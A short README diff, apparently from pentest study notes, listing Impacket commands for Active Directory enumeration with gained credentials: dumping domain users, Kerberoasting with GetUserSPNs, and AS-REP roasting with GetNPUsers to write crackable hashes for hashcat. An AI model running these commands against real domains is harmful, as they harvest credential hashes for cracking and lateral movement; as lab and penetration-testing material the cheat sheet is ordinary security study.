divandenyss/ba51c_Activ3_Direct0ry_3numeration/README.md

 # Impacket to Rule them All
+"What is Impacket used for?
+Impacket is an open-source collection of modules written in Python for programmatically constructing and manipulating network protocols."
 If credentials have been gained, they will assist with the following commands that can be run in the domain

 *Enter details between the placeholders --> ()

 ## Getting AD Users
 python3 GetADUsers.py -all '(domain)/(user):(password)' -dc-ip (IP)

+## Kerberoasting
+python3 GetUserSPNs.py test.local/john:password123 -dc-ip 10.10.10.1 -request

+## ASREP Roasting
+python3 GetNPUsers.py test.local/ -dc-ip 10.10.10.1 -usersfile usernames.txt -format hashcat -outputfile hashes.txt